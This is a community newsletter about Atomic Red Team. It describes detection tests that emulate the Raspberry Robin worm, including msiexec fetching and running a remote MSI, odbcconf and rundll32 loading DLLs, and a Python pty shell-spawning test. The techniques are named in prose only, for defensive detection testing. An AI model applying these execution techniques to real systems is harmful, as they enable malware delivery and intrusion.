Welcome to this month's edition of the Atomic Newsletter, a monthly email with updates and news about Atomic Red Team™ and its related projects such as MITRE ATT&CK®, Invoke-AtomicRedTeam, AtomicTestHarnesses, and more. Visit our website and join the community chat with us on Slack!

This month's edition highlights tests for Raspberry Robin, a threat discovered by Red Canary that Microsoft recently linked to the EvilCorp hacking group.

What is Raspberry Robin?

For nearly a year, Red Canary has been tracking a worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

How can I test my detection coverage?

Watch Red Canary's Paul Michaud walk through four Atomic Red Team tests that will help you emulate behaviors associated with Raspberry Robin. Are you able to observe, detect, or prevent infection?

T1059.003: CMD reading and executing from file

We developed this atomic specifically to emulate Raspberry Robin. It uses the “standard-in” command prompt feature to read and execute a file via cmd.exe.

T1218:007: msiexec downloading additional packages

This atomic retrieves an arbitrary MSI file from a remote IP address and executes it.

T1218.008: obdcconf loading and executing locally stored DLLs

This atomic uses odbcconf.exe to load and execute a locally stored DLL.

T1218.011: rundll32 initiating network connections

This atomic emulates the rundll32.exe process start and the network connection (with a corresponding command line).


Top contributors

  • danf42
  • MHaggis4
  • Leomon5
  • tccontre
  • tr4cefl0w

New contributors

  • it-native
  • TaintedHorizon
  • masonharrell
  • moullos
  • alireza-ebrahimi
  • felipebueno
  • burning-pm
  • mrrothe
  • arames13
NEW TEST: Python pty module spawning sh or bash

First-time contributor ruyek-git created a test that emulates malicious use of the Python pty module observed by Volexity, as part of their investigation into widespread exploitation of CVE-2022-26134, an unauthenticated remote code execution vulnerability in Atlassian Confluence.

New integration with VECTR

You can now import Atomic Red Team execution logs into VECTR, a free purple team reporting tool. Atomic Red Team maintainer Carrie Roberts shows you how in a new video from our friends at Antisyphon Training.

Work with us!

Red Canary is looking for a developer advocate to focus on Atomic Red Team. Join us and work alongside the Atomic community to address cybersecurity challenges through open source tools and education.

  Twitter   LinkedIn   GitHub   YouTube   Slack